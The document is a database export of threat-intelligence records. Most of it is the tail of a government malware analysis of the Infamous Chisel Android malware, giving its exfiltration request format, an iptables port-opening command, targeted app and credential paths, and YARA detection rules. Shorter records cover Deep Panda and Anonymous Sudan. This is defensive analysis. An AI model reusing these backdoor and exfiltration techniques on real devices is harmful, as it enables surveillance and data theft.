for port 34371 through the firewall. The Tor utility executed by blob on the device is configured to provide a hidden service on this port, then forward connections to the local dropbear instance. The .onion address has already been exfiltrated enabling the actor to connect to it. Modifications have been made to dropbear authentication mechanisms. The scp utility does not appear to have been modified. The nmap utility has the same functionality as the version in netd but is executed manually by actor interaction. The watchdog, rmflag, and mkflag utilities appear to be additional actor-created code that has been incorporated to perform some configuration for dropbear. The directory sessions.log.d is created under /data/local/tmp/, and puts all standard Dropbear files under this directory alongside the custom actor file remove_file.flag. The watchdog utility performs setup and executes dropbear. This setup includes: The remove_file.flag file is created containing the string run when any of the multi-call utilities run Dropbear. This will be collected and exfiltrated by netd giving the actor an indicator that the SSH server is active. A host key is placed into the directory: /data/local/tmp/sessions.log.d/.ssh/authorized_keys /usr/sbin/iptables is executed with the parameters: -A INPUT -p tcp --dport 34371 -j ACCEPT -I The mkflag utility creates the directories and files that watchdog creates but does not perform any host file or IP table manipulation, and then runs dropbear. The rmflag utility deletes /data/local/tmp/sessions.log.d/.ssh/remove_file.flag The actor has modified authentication mechanisms in Dropbear. The Dropbear function fill_passwd is used to verify that a supplied username is a valid account and return information required to process authentication. The unmodified source code for this can be found in the Appendix (Dropbear fill_passwd function) Section of this report. This function calls multiple Linux library functions, getpwnam, getspnam, getpwuid, but in the modified version actor replacement functions are called instead, each of these are discussed below. getpwnam Linux library function accepts a username and cross-references it with the passwd file usually stored at /etc/passwd for the corresponding entry containing the colon concatenated fields: On most modern systems, an x in the user password field is used to denote that the password hash is stored in the /etc/shadow file that requires root privileges to read. On an Android device, there are typically no such files, so the structure that would usually be retrieved from the passwd file is generated instead. The actor has replaced this function with their own, where if a particular username is seen it returns a hard-coded response. If the expected username is not seen, the /etc/passwd file is checked for the corresponding username as normal. getpwuid Linux library accepts a uid and returns the corresponding structure above typically from the /etc/passwd file. The actor has replaced this function to check for the uid of 0xbeef and return the hard-coded structure detailed above, if found. If 0xbeef is not seen, it will revert to checking /etc/passwd. getspnam Linux library function accepts a username and cross-references it with the shadow file usually stored at /etc/shadow for the corresponding entry that contains the dollar concatenated fields: Typically, on an Android device, this function would return NULL, but the actor replacement function uses the Linux version. There does not appear to be any modifications other than those detailed above, but there may be other patches implemented. The NDBR_armv7l and NDBR_i686 utilities contain multiple individual utilities compiled for ARM and x86 respectively. They both include the above authentication mechanism modification, although with different credentials, and otherwise appear to be the same. These utilities also have some functionality overlap with the VPNFilter malware but appear to be an evolution.[1](link is external) killer is a simple program, the main purpose of which is to terminate netd. It achieves this by performing the following steps: When a file is to be exfiltrated, a Transport Layer Security (TLS) connection is initiated to a hard-coded local IP and port. Note: This local IP address is likely a local port forward to relay the network traffic over a secure channel, such as a Virtual Private Network (VPN) configured on the device. VPN services are often configured in this way, giving the actor a means to exfiltrate information from the network which blends in with expected encrypted network traffic. If a connection to the local IP and port fails, a hard-coded domain is used as a fallback connection. The IP address for this domain is resolved using a request to dns.google. POST /dns-query HTTP/1.1 Host: dns.google User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: application/dns-message Content-Type: application/dns-message Content-Length: Note: The hard-coded user agent that relates to a Microsoft Windows operating system would raise suspicion originating from an Android device. But since all the communications are under TLS, it would make inspecting the HTTP headers difficult. The following HTTP Post request is used to exfiltrate data: Data structure POST /server.php?ver=16&bid=%s&type=%d HTTP/1.1 User-Agent: curl/7.47 Host: Path: %s Content-Type: application/octet-stream Content-Length: %d   <Raw File> Android ID Type: 0 or 1 Base64 encoded file path Content Length of the encoded file to be exfiltrated File contents   The Infamous Chisel components are low to medium sophistication and appear to have been developed with little regard to defense evasion or concealment of malicious activity. The searching of specific files and directory paths that relate to military applications and exfiltration of this data reinforces the intention to gain access to these networks. Although the components lack basic obfuscation or stealth techniques to disguise activity, the actor may have deemed this not necessary, since many Android devices do not have a host-based detection system. Two interesting techniques are present in Infamous Chisel: These techniques require a good level of C++ knowledge to make the alterations and an awareness of Linux authentication and boot mechanisms. Even with the lack of concealment functions, these components present a serious threat because of the impact of the information they can collect. Type Description Values netd POST Request C2 communication POST /server.php?ver=16&bid=%s&type=%d HTTP/1.1\\r\\n User-Agent: curl/7.47\\r\\n netd Paths Relocated legitimate netd /system/bin/netd_ netd Paths IP address information /data/local/tmp/.syscache.csv netd Paths Application list /data/local/tmp/.syspackages.csv netd Paths Getprop output /data/local/tmp/.sysinfo.csv netd Paths Android ID /data/local/tmp/.aid.cache netd Paths Triage shell script /data/local/tmp/.android.cache.sh netd Paths Exfiltrated file hash list location /sdcard/Android/data/.google.index /storage/emulated/0/Android/data/.google.index /storage/emulated/1/Android/data/.google.index netd_ Process Listing Name Renamed legitimate netd netd_ td Paths Binary path /data/local/td td Paths Configuration file path /data/local/prx.cfg td Paths Configuration file directory /data/local/prx td Paths Tor generated files /data/local/prx/cached-certs /data/local/prx/cached-microdesc-consensus /data/local/prx/cached-microdescs /data/local/prx/cached-microdescs.new /data/local/prx/lock /data/local/prx/state td Paths Configuration file directory /data/local/prx/hs td Paths Hidden service path /data/local/prx/hs/hostname td Paths Public key /data/local/prx/hs/hs_ed25519_public_key td Paths Private key /data/local/prx/hs/hs_ed25519_secret_key td Paths Compressed installer file td.bz2 blob Paths Binary path /data/local/blob blob Process Listing Name Process list entry blob killer Paths Binary path /data/local/killer db Paths Binary path /data/local/db db Process Listing Name Process list entry db NDBR_armv7l Paths Binary path /data/local/NDBR_armv7l NDBR_armv7l Process Listing Name Process list entry NDBR_armv7l NDBR_i686 Paths Binary path /data/local/NDBR_i686 NDBR_i686 Process Listing Name Process list entry NDBR_i686 Type Description Values td Process Listing Name Process list entry td td Local Port Port open socks 127.0.0[.]1:1129 td Local Port Port open hidden service 127.0.0[.]1:34371 tcpdump Paths Binary path /data/local/tcpdump tcpdump Process Listing Name Process list entry tcpdump blob Domain Domain communication www.geodatatool[.]com db IP Tables IP tables Port 34371 Present Description Unique paths created by netd Precision High Confidence – no hits in VirusTotal Rule type YARA   rule netd_CreatedFiles {   meta:     author = \"NCSC\"     description = \"Unique file paths created by netd\"     date = \"2023-08-31\"   strings:     $ = \"/data/local/tmp/.aid.cache\"     $ = \"/data/local/tmp/.syscache.csv\"    $ = \"/data/local/tmp/.syspackages.csv\"     $ = \"/data/local/tmp/.sysinfo.csv\"     $ = \"/data/local/tmp/.ndata.csv\"     $ = \"/data/local/tmp/.ndata.tmp\"     $ = \"/data/local/tmp/.android.cache.sh\"   condition:     uint32(0) == 0x464C457F and any of them }   Description Application directories strings searched by netd Precision High Confidence – no hits in VirusTotal Rule type YARA   rule netd_ScrapedApps {   meta:     author = \"NCSC\"     description = \"Application directories strings searched by netd\"     date = \"2023-08-31\"   strings:     $ = \"/data/data/com.android.providers.contacts\"     $ = \"/data/data/com.android.providers.telephony\"     $ = \"/data/data/com.google.android.gm\"     $ = \"/data/data/de.blinkt.openvpn\"     $ = \"/data/data/eu.thedarken.wldonate\"     $ = \"/data/data/net.openvpn.openvpn\"     $ = \"/data/data/org.telegram.messenger\"     $ = \"/data/data/org.thoughtcrime.securesms\"   condition:     uint32(0) == 0x464C457F and all of them }   Description POST request strings present in netd Precision High Confidence – no hits in VirusTotal Rule type YARA   rule netd_Uri {   meta:     author = \"NCSC\"     description = \"POST request strings present in netd\"     date = \"2023-08-31\"   strings:     $ = \"POST /server.php?ver=16&bid=%s&type=%d\"     $ = \"User-Agent: curl/7.47\"   condition:     uint32(0) == 0x464C457F and all of them }   Description db and td path strings found in netd Precision High Confidence – no hits in VirusTotal Rule type YARA   rule netd_Paths {   meta:     author = \"NCSC\"     description = \"db and td path strings found in netd\"     date = \"2023-08-31\"   strings:     $ = \"/data/local/db\"     $ = \"/data/local/prx.cfg\"     $ = \"/data/local/td\"   condition:     uint32(0) == 0x464C457F and all of them }   Description File extension list string found in netd Precision High Confidence – no hits in VirusTotal Rule type YARA   rule netd_FileExtensionString {   meta:     author = \"NCSC\"     description = \"File extension strings\"     date = \"2023-08-31\"       strings:             $ = \".dat,.bak,.xml,.txt,.ovpn,.xml,wa.db,msgstore.db,.pdf,.xlsx,.csv,.zip,telephony.db,.png,.jpg,.jpeg,.kme,database.hik,database.hik-journal,ezvizlog.db,cache4.db,contacts2.db,.docx,.gz,.rar,.tar,.7zip,.zip,.kmz,locksettings.db,mmssms.db,telephony.db,signal.db,mmssms.db,profile.db,accounts.db,PyroMsg.DB,.exe,.kml\"       condition:             uint32(0) == 0x464C457F and any of them }   Description blob path string found in netd Precision High Confidence – no hits in VirusTotal Rule type YARA   rule netd_Blob {   meta:     author = \"NCSC\"     description = \"blob path string found in netd\"     date = \"2023-08-31\"   strings:     $ = \"/data/local/tmp/blob\"   condition:     uint32(0) == 0x464C457F and any of them }   Description Tor hostname path string found in netd Precision High Confidence – no hits in VirusTotal Rule type YARA   rule netd_TorDomainPath {   meta:     author = \"NCSC\"     description = \"Tor hostname path string found in netd\"     date = \"2023-08-31\"   strings:     $ = \"/data/local/prx/hs/hostname\"   condition:     uint32(0) == 0x464C457F and any of them }   Description Shell script commands found in netd Precision High Confidence – no hits in VirusTotal Rule type YARA   rule netd_TriageCommands {   meta:     author = \"NCSC\"     description = \"Shell script commands found in netd\"     date = \"2023-08-31\"   strings:     $ = \"settings get secure android_id\"     $ = \"pm list packages\"     $ = \"getprop\"   condition:     uint32(0) == 0x464C457F and all of them }   Description netd wait loop Precision High Confidence – no hits in VirusTotal Rule type YARA   rule netd_waitloop {   meta:     author = \"NCSC\"     description = \"netd wait loop\"     date = \"2023-08-31\"   strings:     $ = {38 23 F9 18 01 23 5B 42 01 22 18 00 ?? ?? ?? ?? 0F 20}   condition:     uint32(0) == 0x464C457F and any of them }     Description netd pid for loop Precision High Confidence – no hits in VirusTotal Rule type YARA   rule netd_pidloop {   meta:     author = \"NCSC\"     description = \"netd pid for loop\"     date = \"2023-08-31\"   strings:     $ = {1B 68 8A 4A 93 42 ?? ?? ?? ?? C0 46}   condition:     uint32(0) == 0x464C457F and any of them } Description Tor configuration file strings in blob Precision High Confidence – no hits in VirusTotal Rule type YARA   rule blob_TorCommandLine {   meta:     author = \"NCSC\"     description = \"Tor configuration file strings in blob\"     date = \"2023-08-31\"   strings:     $ = \"SocksPort 127.0.0.1:1129\"     $ = \"DataDirectory /data/local/prx/\"     $ = \"/data/local/prx/hs/\"     $ = \"HiddenServicePort 34371 127.0.0.1:34371\"   condition:     uint32(0) == 0x464C457F and 2 of them }   Description blob wait on event loop Precision High Confidence – no hits in VirusTotal Rule type YARA   rule blob_waitloop {   meta:     author = \"NCSC\"     description = \"blob wait on event loop\"     date = \"2023-08-31\"   strings:     $ = {0C 23 F9 18 01 23 5B 42 01 22 18 00 ?? ?? ?? ?? 03 1E}   condition:     uint32(0) == 0x464C457F and any of them }   Description killer binary strings Precision High Confidence – no hits in VirusTotal Rule type YARA   rule killer_Strings {   meta:     author = \"NCSC\"     description = \"killer binary strings\"     date = \"2023-08-31\"   strings:     $ = \"netd_\"     $ = \"/proc/%d/exe\"     $ = \"/proc/%d/status\"   condition:     uint32(0) == 0x464C457F and uint8(4) == 0x1 and uint16(18) == 0x0028 and all of them }   Description db Android path strings Precision High Confidence – no hits in VirusTotal Rule type YARA   rule db_androidpaths {   meta:     author = \"NCSC\"     description = \"db Android path strings\"     date = \"2023-08-31\"   strings:     $ = \"/data/local/tmp/sessions.log.d/.ssh/remove_file.flag\"     $ = \"/data/local/tmp/sessions.log.d\"     $ = \"/data/local/tmp/sessions.log.d/.ssh\"     $ = \"/data/local/tmp/sessions.log.d/.ssh/authorized_keys\"     $ = \"/data/local/tmp/sessions.log.d/.ssh/know_host\"     $ = \"/data/local/tmp/sessions.log.d/dropbear_rsa_host_key\"     $ = \"/data/local/tmp/sessions.log.d/dropbear_dss_host_key\"     $ = \"/data/local/tmp/sessions.log.d/dropbear_ecdsa_host_key\"     $ = \"/data/local/tmp/sessions.log.d/session.key\"     $ = \"/data/local/tmp/sessions.log.d/.bash_history\"     $ = \"/data/local/tmp/sessions.log.d/dropbear_ed25519_host_key\"     $ = \"/data/local/tmp/sessions.log.d/\"     $ = \"/data/local/tmp/sessions.log.d\"   condition:     uint32(0) == 0x464C457F and uint8(4) == 0x1 and uint16(18) == 0x0028 and all of them }   Description ndbr scan strings Precision High Confidence – no hits in VirusTotal Rule type YARA   rule ndbr_ScanStrings {   meta:     author = \"NCSC\"     description = \"ndbr scan strings\"     date = \"2023-08-31\"   strings:     $ = \"INTERFACE = %s\"     $ = \"SOURCE = %s\"     $ = \"IP begin = %s\"     $ = \"IP end = %s\"     $ = \"PORT = top\"     $ = \"PORT begin = %hu\"     $ = \"PORT end = %hu\"     $ = \"PING %s\"     $ = \"SCAN %s\"     $ = \"*******start*scan********\"     $ = \"Host %s:\"   condition:     uint32(0) == 0x464C457F and uint8(4) == 0x1 and uint16(18) == 0x0028 and all of them }   void fill_passwd(const char* username) {       struct passwd *pw = NULL;       if (ses.authstate.pw_name)             m_free(ses.authstate.pw_name);       if (ses.authstate.pw_dir)             m_free(ses.authstate.pw_dir);       if (ses.authstate.pw_shell)             m_free(ses.authstate.pw_shell);       if (ses.authstate.pw_passwd)             m_free(ses.authstate.pw_passwd);         pw = getpwnam(username);       if (!pw) {             return;       }       ses.authstate.pw_uid = pw->pw_uid;       ses.authstate.pw_gid = pw->pw_gid;       ses.authstate.pw_name = m_strdup(pw->pw_name);       ses.authstate.pw_dir = m_strdup(pw->pw_dir);       ses.authstate.pw_shell = m_strdup(pw->pw_shell);       {             char *passwd_crypt = pw->pw_passwd; #ifdef HAVE_SHADOW_H             /* get the shadow password if possible */             struct spwd *spasswd = getspnam(ses.authstate.pw_name);             if (spasswd && spasswd->sp_pwdp) {                   passwd_crypt = spasswd->sp_pwdp;             } #endif             if (!passwd_crypt) {                   /* android supposedly returns NULL */                   passwd_crypt = \"!!\";             }             ses.authstate.pw_passwd = m_strdup(passwd_crypt);       } }   /* login_init_entry(struct logininfo *, int, char*, char*, char*)  *                                        - initialise a struct logininfo  *  * Populates a new struct logininfo, a data structure meant to carry  * the information required to portably record login info.  *  * Returns: 1  */ int login_init_entry(struct logininfo *li, int pid, const char *username,              const char *hostname, const char *line) {       struct passwd *pw;         memset(li, 0, sizeof(*li));         li->pid = pid;         /* set the line information */       if (line)             line_fullname(li->line, line, sizeof(li->line));         if (username) {             strlcpy(li->username, username, sizeof(li->username));             pw = getpwnam(li->username);             if (pw == NULL)                   dropbear_exit(\"login_init_entry: Cannot find user \\\"%s\\\"\",                               li->username);             li->uid = pw->pw_uid;       }         if (hostname)             strlcpy(li->hostname, hostname, sizeof(li->hostname));         return 1;   /* Set up a session pty which will be used to execute the shell or program.  * The pty is allocated now, and kept for when the shell/program executes.  * Returns DROPBEAR_SUCCESS or DROPBEAR_FAILURE */ static int sessionpty(struct ChanSess * chansess) {         unsigned int termlen;       char namebuf[65];       struct passwd * pw = NULL;         TRACE((\"enter sessionpty\"))         if (!svr_pubkey_allows_pty()) {             TRACE((\"leave sessionpty : pty forbidden by public key option\"))             return DROPBEAR_FAILURE;       }         chansess->term = buf_getstring(ses.payload, &termlen);       if (termlen > MAX_TERM_LEN) {             /* TODO send disconnect ? */             TRACE((\"leave sessionpty: term len too long\"))             return DROPBEAR_FAILURE;       }         /* allocate the pty */       if (chansess->master != -1) {             dropbear_exit(\"Multiple pty requests\");       }       if (pty_allocate(&chansess->master, &chansess->slave, namebuf, 64) == 0) {             TRACE((\"leave sessionpty: failed to allocate pty\"))             return DROPBEAR_FAILURE;       }             chansess->tty = m_strdup(namebuf);       if (!chansess->tty) {             dropbear_exit(\"Out of memory\"); /* TODO disconnect */       }         pw = getpwnam(ses.authstate.pw_name);       if (!pw)             dropbear_exit(\"getpwnam failed after succeeding previously\");       pty_setowner(pw, chansess->tty);         /* Set up the rows/col counts */       sessionwinchange(chansess);         /* Read the terminal modes */       get_termmodes(chansess);         TRACE((\"leave sessionpty\"))       return DROPBEAR_SUCCESS; }   Usage nmap -ip* <ip-addr: 192.168.0.1/ip-range: 192.168.0.0/24> -p* <port: 80/port-range: 25-125/top> -udp <default tcp> -noping <default yes> -o <out_file> -t <timeout> <-n> <-h/--help (print this help)   Dropbear SSH client v2020.81 https://matt.ucc.asn.au/dropbear/dropbear.html Usage: dbclient [options] [user@]host[/port][,[user@]host/port],...] [command] -p <remoteport> -l <username> -t    Allocate a pty -T    Don't allocate a pty -N    Don't run a remote command -f    Run in background after auth -y    Always accept remote host key if unknown -y -y Don't perform any remote host key checking (caution) -s    Request a subsystem (use by external sftp) -o option     Set option in OpenSSH-like format ('-o help' to list options) -i <identityfile>   (multiple allowed, default .ssh/id_dropbear) -A    Enable agent auth forwarding -L <[listenaddress:]listenport:remotehost:remoteport> Local port forwarding -g    Allow remote hosts to connect to forwarded ports -R <[listenaddress:]listenport:remotehost:remoteport> Remote port forwarding -W <receive_window_buffer> (default 24576, larger may be faster, max 1MB) -K <keepalive>  (0 is never, default 30) -I <idle_timeout>  (0 is never, default 1800) -B <endhost:endport> Netcat-alike forwarding -J <proxy_program> Use program pipe rather than TCP connection -c <cipher list> Specify preferred ciphers ('-c help' to list options) -m <MAC list> Specify preferred MACs for packet verification (or '-m help') -b    [bind_address][:bind_port] -V    Version scp usage: scp [-1246BCpqrv] [-c cipher] [-F ssh_config] [-i identity_file]            [-l limit] [-P port] [-S program]            [[user@]host1:]file1 [...] [[user@]host2:]file2     Must specify a key filename Usage: dropbearkey -t <type> -f <filename> [-s bits] -t type     Type of key to generate. One of:             rsa             dss             ecdsa             ed25519 -f filename    Use filename for the secret key.                ~/.ssh/id_dropbear is recommended for client keys. -s bits     Key size in bits, should be a multiple of 8 (optional)            DSS has a fixed size of 1024 bits            ECDSA has sizes 256 384 521            Ed25519 has a fixed size of 256 bits -y          Just print the publickey and fingerprint for the             private key in <filename>.   Dropbear server v2020.81 https://matt.ucc.asn.au/dropbear/dropbear.html Usage: dropbear [options] -b bannerfile     Display the contents of bannerfile before user login             (default: none) -r keyfile      Specify hostkeys (repeatable)             defaults:             - dss /tmp/sessions.log.d/dropbear_dss_host_key             - rsa /tmp/sessions.log.d/dropbear_rsa_host_key             - ecdsa /tmp/sessions.log.d/dropbear_ecdsa_host_key             - ed25519 /tmp/sessions.log.d/dropbear_ed25519_host_key -R          Create hostkeys as required -F          Don't fork into background (Syslog support not compiled in, using stderr) -w          Disallow root logins -G          Restrict logins to members of specified group -s          Disable password logins -g          Disable password logins for root -B          Allow blank password logins -T          Maximum authentication tries (default 10) -j          Disable local port forwarding -k          Disable remote port forwarding -a          Allow connections to forwarded ports from any host -c command  Force executed command -p [address:]port             Listen on specified tcp port (and optionally address),             up to 10 can be specified             (default port is 2222 if none specified) -P PidFile  Create pid file PidFile             (default /var/run/sessionlog.pid) -i          Start for inetd -W <receive_window_buffer> (default 24576, larger may be faster, max 1MB) -K <keepalive>  (0 is never, default 30, in seconds) -I <idle_timeout>  (0 is never, default 1800, in seconds) -V    Version   This report draws on information derived from NCSC and industry sources. Any NCSC findings and recommendations made have not been provided with the intention of avoiding all risks and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times. This information is exempt under the Freedom of Information Act 2000 (FOIA) and may be exempt under other UK information legislation. Refer any FOIA queries to ncscinfoleg@ncsc.gov.uk(link sends email). All material is UK Crown Copyright ©   This product is provided subject to this Notification and this Privacy & Use policy. We recently updated our anonymous product survey; we’d welcome your feedback.        Home News & Events Cybersecurity Advisories Analysis Report Infamous Chisel is a collection of components targeting Android devices. This malware is associated with Sandworm activity. It performs periodic scanning of files and network information for exfiltration. System and application configuration files are exfiltrated from an infected device. Infamous Chisel provides network backdoor access via a Tor (The Onion Router) hidden service and Secure Shell (SSH). Other capabilities include network monitoring, traffic collection, SSH access, network scanning, and SCP file transfer. /sdcard/Android/data/.google.index /storage/emulated/0/Android/data/.google.index /storage/emulated/1/Android/data/.google.index /sdcard /storage/emulated/0/ /data/media /data/data/de.blinkt.openvpn /data/data/org.thoughtcrime.securesms /data/data/net.openvpn.openvpn /data/data/org.telegram.messenger /data/data/vpn.fastvpn.freevpn /data/data/eu.thedarken.wldonate /data/data/com.android.providers.contacts /data/data/com.android.providers.telephony /data/data/com.google.android.gm /data/system/users/0/ com.google.android.apps.authenticator2 net.openvpn.openvpn free.vpn.unblock.proxy.vpnmaster com.UCMobile.intl com.brave.browser com.opera.browser com.hisense.odinbrowser com.dzura com.google.android.apps.docs com.sec.android.app.myfiles com.microsoft.skydrive com.google.android.apps.walletnfcrel com.paypal.android.p2pmobile com.binance.dev com.coinbase.android com.wallet.crypto.trustapp com.viber.voip com.dropbox.android com.android.providers.telephony com.android.providers.contacts com.cxinventor.file.explorer com.elinke.fileserver org.mozilla.firefox com.whatsapp org.thoughtcrime.securesms org.telegram.messenger org.telegram.messenger.web com.discord com.hikvisionsystems.app com.hikvision.hikconnect com.skype.raider com.google.android.gm com.android.chrome org.chromium.webview_shell keystore /data/local/tmp/.syscache.csv /data/local/tmp/.syspackages.csv /data/local/tmp/.sysinfo.csv /data/system/users/0/settings_ssaid.xml /sdcard /storage/emulated/0/ /data/media /data/data/de.blinkt.openvpn /data/data/org.thoughtcrime.securesms /data/data/net.openvpn.openvpn /data/data/org.telegram.messenger /data/data/vpn.fastvpn.freevpn /data/data/eu.thedarken.wldonate /data/data/com.android.providers.contacts /data/data/com.android.providers.telephony /data/data/com.google.android.gm /data/system/users/0/ Checks local host for the port 1129 being open, exiting if it is. Checks for the existence of /data/local/td. If this is not present, extracts it from /data/local/td.bz2 (bzip2 compressed data). Creates the configuration file at the path: /data/local/prx.cfg. The contents of which are detailed in the Components (td) section above. td is executed with this configuration file being supplied with the -f command line parameter: /data/local/td -f /data/local/prx.cfg. db the modified Dropbear SSH utility is checked for at the path /data/local/db. If this file is not present, it is extracted from /data/local/db.bz2. db is then executed immediately after, with no command line parameters being passed. blob then enters a loop where it performs a network connectivity check against the domain www.geodatatool[.]com connecting on the local SOCKS4 address provided by the td utility 127.0.0[.]1:1129 every 3 minutes. It checks the second byte of the response from this domain to be the character Z (0x5a) to validate a legitimate response has been received from the server. Nothing further is done with the data; this is simply an internet connection check. If this request fails or the server doesn’t return the expected data, blob terminates the execution of td. /data/local/tmp/sessions.log.d /data/local/tmp/sessions.log.d/.ssh /data/local/tmp/sessions.log.d/.ssh/remove_file.flag username user password user ID group ID user information home directory shell program id salt hash Iterates through all Process Identifiers (PIDs) in the range 2 through to 0x3FFFFF. Checks the first line of /proc/<pid>/status for the string netd. Checks the target of the link referenced at /proc/<pid>/exe against netd. Checks the executable name is not netd_ (The legitimate backup executed by the malicious netd). Terminates the malicious netd leaving the legitimate netd_ running.  The Android ID is generated by the initial script run, using the command settings get secure android_id. Type denotes the exfiltration type:\n0 is used for the file searches, triage script and configurations files.\n1 is used for other information such as the Tor domain. 0 is used for the file searches, triage script and configurations files. 1 is used for other information such as the Tor domain. the replacement of the legitimate netd executable to maintain persistence. the modification of the authentication function in the components that include dropbear. Topics Spotlight Resources & Tools News & Events Careers About Facebook Twitter LinkedIn YouTube Instagram RSS About CISA Accessibility Budget and Performance Contact DHS.gov FOIA Requests No FEAR Act Office of Inspector General Privacy Policy Subscribe The White House USA.gov Website Feedback",
  "status": "COMPLETE",
  "report_type": "WEBSITE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-08-31T19:23:11.886Z"
  },
  "added_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "64f0f97565258c763358dfeb"
  },
  "name": "Deep Panda",
  "file_type": null,
  "website_url": "https://www.zdnet.com/article/chinese-hackers-deep-panda-return-with-log4shell-exploits-new-fire-chili-rootkit/",
  "website_title": "Chinese hackers Deep Panda return with",
  "file_name": null,
  "file_size": null,
  "content": "most popular  Deep Panda has launched new attacks this month that exploit Log4Shell to deploy the new Fire Chili rootkit. Deep Panda is a Chinese advanced persistent threat (APT) hacking group that has been active for at least a decade. The APT targets government, defense, healthcare, telecoms, and financial organizations, to name a few, for purposes including data theft and surveillance. Becoming a certified ethical hacker can lead to a rewarding career. Here are our recommendations for the top certifications. The cyberattackers have a wide range of malicious tools, including the Milestone backdoor and the Infoadmin Remote Access Trojan (RAT) based on Gh0st RAT code. There may also be affiliation to Winnti, a separate Chinese group known to target game developers and vendors. A new campaign detected by FortiGuard Labs researchers is the work of Deep Panda, which is targeting organizations in the finance, travel, and cosmetic industries. During the past month, FortiGuard has detected the group's active exploitation of Log4Shell, a critical vulnerability in the Apache Log4J Java logging library (CVE-2021-44228, CVSS 10.0), to spread a new, \"novel\" rootkit. Attackers from various groups use Log4Shell to compromise VMware Horizon servers for data exfiltration and cryptojacking. In Deep Panda's case, the new rootkit, dubbed Fire Chili, is designed to keep activities under the radar and is deployed alongside the Milestone backdoor. Fire Chili has been signed with a stolen digital certificate -- the same used by Winnti to sign-off malicious tools -- and will check to ensure the victim machine is not running in safe mode. \"It then checks the operating system version,\" the researchers say. \"The rootkit uses Direct Kernel Object Modification (DKOM), which involves undocumented kernel structures and objects, for its operations. For this reason, it relies on specific OS builds as otherwise, it may cause the infected machine to crash.\" The latest supported build is Windows 10 Creators Update (Redstone 2). Drivers are implemented to hide malicious objects from existing security systems. The rootkit will also tamper with the registry to stop malicious processes from being terminated, and a callback is generated to disguise newly-created processes from utilities including Task Manager. The researchers collected four-driver samples, both 32-bit and 64-bit, compiled in 2017. The samples were signed with stolen certificates issued by U.S. and Korean gaming companies. In addition, the malware can hide registry keys and TCP network connections.  The Milestone backdoor is then installed on the target machine for ongoing data theft and persistence. The researchers also discovered a dropper containing a Milestone loader. \"Although both Deep Panda and Winnti are known to use rootkits as part of their toolset, Fire Chili is a novel strain with a unique code base different from the ones previously affiliated with the groups,\" FortiGuard says. \"The reason these tools are linked to two different groups is unclear at this time. It's possible that the groups' developers shared resources, such as stolen certificates and C2 infrastructure, with each other.\" See also Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0                                                                                                                                                                                                                                                                               Transparent Tribe APT returns to strike India's government and military Suspected DarkHotel APT resurgence targets luxury Chinese hotels New advanced hacking group targets governments, engineers worldwide 8 habits of highly secure remote workers How to find and remove spyware from your phone The best VPN services: How do the top 5 compare? How to find out if you are involved in a data breach -- and what to do next topics galleries videos do not sell or share my personal information about ZDNET meet the team sitemap reprint policy join | log in newsletters site assistance licensing",
  "status": "COMPLETE",
  "report_type": "WEBSITE",
  "added_on": {
    "$date": "2023-08-31T20:35:01.875Z"
  },
  "added_by": "5WWyZVTNVXRMC7eb0YwTlemJDYE3",
  "updated_by": "JODXxzgrRphYBU6pDa6huM2JSPL2",
  "updated_on": {
    "$date": "2023-09-01T22:33:14.186Z"
  },
  "gcloud_request": null,
  "message": "Completed Successfully"
},
{
  "_id": {
    "$oid": "64f234163c3706217c70f20a"
  },
  "name": "Anonymous Sudan",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "Anonymous_Sudan.pdf",
  "file_size": "135 KB",
  "content": "Threat Group Overview: \n\nAfter gaining attention in 2022, Anonymous Sudan has emerged as a significant and politically motivated \nplayer in DDoS attacks, closely associated and partnered with Killnet and REvil. While claiming to be a \nSudan-based pro-Islamic hacktivist organization, some researchers speculate that they may function \nmerely as a subsidiary experimental group of Killnet. \n\nSources: \n\nAllinfosecnews \n\nBleepingComputer \n\nDarkReading[1][2] \n\nTrustWave \n\nHackRead \n\nSC Media \n\nIntent: \n\nFrom BleepingComputer: \n\nIn June, Anonymous Sudan turned their attention to Microsoft, where they began DDoS attacks on web-\naccessible portals for Outlook, Azure, and OneDrive, demanding $1 million to stop the attacks. \n\n\"You have failed to repel the attack which has continued for hours, so how about you pay us 1,000,000 \nUSD and we teach your cyber-security experts how to repel the attack and we stop the attack from our \nend? 1 million USD is peanuts for a company like you,\" demanded the group. \n\n\"This is a continuous campaign against US/American companies & infrastructure because of the \nstatement of the US Secretary of State saying there is a possibility of American invasion of Sudan,\" stated \nAnonymous Sudan. \n\nWhile there has been no indication that attacks on European banking systems have started, the group \nhas demonstrated that they have significant resources at their disposal, and financial institutions should \nbe on alert for potential disruption. \n\nFrom Dark Reading: \n\nThe group, which calls itself \"Anonymous Sudan,\" has claimed responsibility for recent DDoS attacks \nagainst targets in France, Germany, the Netherlands, and Sweden. \n\nIn January for instance, Anonymous Sudan claimed to have assisted Killnet in a DDoS attack against \nGermany's Federal Intelligence Service, Trustwave said. \n\nA religious hacktivist group known as Anonymous Sudan has claimed responsibility for the distributed \ndenial-of-service (DDoS) attacks that took down the personal website of Israeli Prime Minister Benjamin \nNetanyahu and the hijacking of his Facebook account. \n\n\fThey also claimed responsibility for bringing down the National Insurance Institute's website as well as \nthat of Mossad, Israel's spy agency. \n\nToday, the group is claiming that they are behind the sprawling power outages in Israel, including major \ncities such as Tel Aviv and Beersheba, writing \"Is darkness good? Why don't you have electricity?\" on its \nTelegram channel. \n\nFrom TrustWave: \n\nIn a recent development, Russian hackers have declared their intention to launch cyberattacks on the \nEuropean financial system within the next 48 hours. \n\nThis operation appears to be a collaborative effort between the hacking groups KillNet, REvil, and \nAnonymous Sudan. \n\nKillNet and Anonymous Sudan groups focus on Distributed Denial of Service (DDoS). The groups are \nknown for orchestrating large-scale DDoS attacks on various entities including airports, banks, energy \nproviders, and government agencies. While this may not result in any actual attacks, the inclusion of \nREvil to the KillNet/AnonSudan collective should raise some eyebrows. \n\nMotivation: \n\nAlthough the group consistently demands money from their victims, it seems as though they are a \nprimarily politically motivated group. \n\nTarget(s): \n\n  Governments \n\n  Political Groups \n\n  Public/Private Businesses \n\nOpportunity: \n\n  Networks vulnerable to being overwhelmed 